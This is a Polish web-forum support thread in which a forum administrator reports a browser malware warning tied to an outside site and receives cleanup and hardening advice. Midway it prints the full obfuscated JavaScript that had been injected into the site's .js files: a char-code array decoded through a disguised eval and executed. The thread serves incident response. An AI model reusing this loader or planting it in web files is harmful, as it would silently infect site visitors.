Złośliwe oprogramowanie

[Grafer]

Witam. Do końca nie byłem pewny w jakim dziale to umieścić i czy w ogóle jest to odpowiednia forum na taki błąd, ale od kilku godzin na moim forum dzieję się coś dziwnego.

Userom wyświetla ostrzeżenie, że na forum wykryto zagrożenie.

Witryna holyshit.pl zawiera treści z witryny trafficslots5.com, która jest znana jako źródło złośliwego oprogramowania. Otwarcie tej witryny grozi zainfekowaniem komputera wirusem.

Na forum nic nie było instalowane, ani wrzucane. Sama strona, która infekuję ma na stronie głównej stronie testową Apache HTTP zasilane CentOS'em.

Można jakoś sprawdzić jakie dane forum ładuję z tej strony? I gdzie to jest ulokowane?

[semenedar]

Najpierw ten temat przeniosę do Admin Extra, następnie dam Ci kilka porad. Sprawa nie będzie prawdopodobnie prosta.

[semenedar]

Automatyczna wiadomość

Temat przeniesiony z forum

Invision Power Board → Invision Power Board 3.3 → Ogólny support IPB

do

Ogólne → Admin Extra

[semenedar]

Strona o której mówisz (trafficslots5.com) według pingów, znajduje się na serwerze w Holandii. Firefox stara się na nią nie wpuścić, uprzedzając o złośliwym oprogramowaniu które ta witryna rozpowszechnia. Co możesz teraz zrobić?

Po pierwsze- sprawdź WŁASNY komputer pod kątem obecności rootkitów, trojanów. Jeżeli nie masz, najpierw zaopatrz się w dobry sprzęt antywirusowy i w pierwszej kolejności, wyeliminuj z podejrzeń swój własny komputer.

Zmień hasło do głównego konta FTP, jeżeli jest zapisane w programie, natychmiast usuń hasło z programu który służy Ci do łączenia i wpisuj je za każdym razem ręcznie. Zmień hasło do bazy danych i nie zapomnij zmienić go również w pliku conf_global.php Sprawdź czy obrazki które ładują się na Twojej stronie pochodzą z zaufanych serwerów (choć wątpię by to było źródłem problemu) Sprawdź zawartość pliku conf_global.php Zmień hasło do głównego konta Admina (własne) oraz inne hasła dla uprawnionych do ACP Użytkowników.

Sprawdź wszystkie indexy i porównaj ich rozmiary z plikami z paczek oryginalnych (index.php na stronie głównej, index.php w katalogu "admin" oraz wszelkie index.htm, html.) Jeżeli używasz IP Content, sprawdź zakładkę edycji stron, czy nie został dopisany złośliwy kod, lub nie została dopisana strona z zakodowanym skryptem. Szukaj na samym końcu plików kodu w base64 lub w inny sposób zakodowanej zawartości. Wirusy zawsze są zakodowane i nie masz co szukać tam odniesień do "trafficslots5.com" Sprawdź wszystkie logi Administracyjne w ACP (działania Administratorów) Usuń wszystkie możliwe pliki z cache szablonów i wygeneruj je od nowa z opcji przebudowy szablonów.

Za pomocą phpmyadmin, pobierz pełną kopię swojej bazy danych i szukaj w niej również podobnych zakodowanych wartości, np za pomocą notepada++. Może Cię również zainteresować ten link: http://jsunpack.jeek...2a36cf39df21e85 pod kątem poszukiwań w bazie oraz w plikach. Bazę koniecznie musisz wyczyścić z intruza jeśli się tam znajduje, ponieważ w przeciwnym wypadku, nie pomoże Ci nawet zmiana hostingu ani całkowity re upload plików z usunięciem wszystkiego z serwera.

Jeśli poszukiwania w plikach nie przyniosą rezultatu, będziesz zmuszony usunąć wszystkie pliki z paczek (oczywiście za wyjątkiem zdjęć i plików download, galerii i innych) i wrzucić je ponownie. Wszystkie pliki php, java skrypty, wszystko. Nadpisanie pomoże tylko w przypadku gdy na Twoim serwerze nie znajdują się nowe pliki ale uprzedzam, że na 90% niestety uploadowane są nowe pliki na Twój serwer i nie usuniesz intruza nadpisując paczkę, bo oczywiście- intruza nie nadpiszesz. Gdy już będziesz miał posprzątane, RADZĘ sie zainteresować tym tematem: http://forum.invisio...pomoca-skryptu/

Pomyśl jak dobrze by Ci było, gdybyś to miał zrobione przed atakiem. Wówczas zlokalizowanie intruza, zajęłoby Ci kilka sekund. Gdy będziesz miał posprzątane, zastosuj WSZYSTKIE możliwe zabezpieczenia z ACP-->Centrum Bezpieczeństwa.

[Grafer]

W prawie wszystkich plikach .js mam kod

/*0247a1*/
																																																																																						  v="va"+"l";try{faweb++}catch(btawetb){try{fve^32}catch(btawt4){w=window;e=w["e".concat(v)];}}if(1){f=new Array(40,101,115,110,98,114,105,110,108,40,40,11,10,122,11,10,31,116,97,113,30,97,31,59,32,99,109,99,116,107,101,109,114,46,98,112,101,96,114,101,68,106,101,108,99,110,115,38,39,104,100,114,96,107,101,38,39,59,12,8,13,9,30,97,45,113,114,98,30,61,31,37,104,115,114,112,57,45,47,115,112,97,101,100,105,98,113,108,110,114,115,52,44,110,100,114,47,99,99,114,104,116,105,109,101,47,100,106,101,98,114,101,99,43,105,109,97,114,100,95,115,100,113,95,114,115,98,108,103,116,115,103,110,102,93,116,110,44,112,103,110,39,58,11,10,31,95,46,114,114,121,107,99,46,111,109,115,104,114,105,110,108,32,60,30,39,96,96,115,110,106,117,115,99,39,58,11,10,31,95,46,114,114,121,107,99,46,97,109,114,99,99,114,31,59,32,38,46,39,58,11,10,31,95,46,114,114,121,107,99,46,103,99,105,102,102,116,31,59,32,38,47,112,119,37,59,12,8,32,96,44,115,115,119,108,100,44,119,104,98,116,103,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,107,99,102,115,30,61,31,37,49,111,118,39,58,11,10,31,95,46,114,114,121,107,99,46,115,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,33,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,95,100,111,106,39,40,39,13,9,30,123,12,8,32,99,109,99,116,107,101,109,114,46,118,112,105,115,99,40,38,58,100,104,116,32,104,98,61,91,37,97,99,110,108,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,99,109,99,116,107,101,109,114,46,102,99,116,68,106,101,108,99,110,115,64,121,72,98,40,38,95,100,111,106,39,40,44,97,111,110,101,109,98,67,103,103,108,99,38,97,40,57,13,9,30,125,12,8,125,40,38,41,58);}w=f;s=[];r=String;x="j%";for(i=0;-i+449!=0;i+=1){j=i;if(e&&(031==0x19))s=s+r["fromCharCode"]((1*w[j]+e(x+3)));}if(0x10==020)try{(w+s)()}catch(asga){e("if(1)"+s+"");}
/*/0247a1*/

to może być to?

[semenedar]

Zapakuj do ZIP i wrzuć do załącznika jeden z (według Ciebie) zainfekowanych plików, w ten temat i podaj ścieżkę, w którym folderze na serwerze się znajdował. Chciałbym go zobaczyć, rozpatrzyć, porównać z oryginalną paczką. Wygląda to na zakodowanego wirusa. Ale źródło problemu i tak może być gdzieś indziej. Prawdopodobnie czeka Cię usuwanie danych i re- upload plików. Ściągałeś bazę i szukałeś w niej podobnych kwiatków?

[Grafer]

Forum stoi na serwerze znajomego, nie mam dostępu do PMA i bazy. Muszę poczekać na niego, aż mi udostępni.

Po usunięciu tego kodu z plików i re-uploadzie mój antyvir już nie wyszukuję żadnego vira na stronie. I z tego co widzę nie pobiera już danych z tej strony.

[semenedar]

Czyli masz rozwiązanie. Widzę też porównanie plików które mi podałeś na PW z oryginałem. To ewidentnie jest to, poza tym nie trzeba być Sherlockiem teraz, skoro identyczny kod, powtarza się w indexach, plikach js i w swfupload jest ewidentnie podpięty i tak skonstruowany, że się "chowa" za edytor Wytnij to wszystko w trzy d*py, nadpisz i nie zapomnij się zastosować do reszty poradnika w kwestiach bezpieczeństwa dostępu do ACP, FTP. Radziłbym Ci jeszcze się nie cieszyć jednak do końca, bo jeżeli sam skrypt wykonania tej "usługi" hehe, jest na serwerze, to cała akcja się powtórzy prędzej czy później.

Sprawdź wszystko

Sprawdź, czy na serwerze nie ma OBCYCH plików.

[Gość ratosluaf]

I przestań używać total commandera... Ewentualnie jak się nie da, to nie zapisywać haseł.

Edytowane 19 Października 2012 przez ratosluaf

[semenedar]

I przestań używać total commandera... Ewentualnie jak się nie da, to nie zapisywać haseł.

Zmień hasło do głównego konta FTP, jeżeli jest zapisane w programie, natychmiast usuń hasło z programu który służy Ci do łączenia i wpisuj je za każdym razem ręcznie.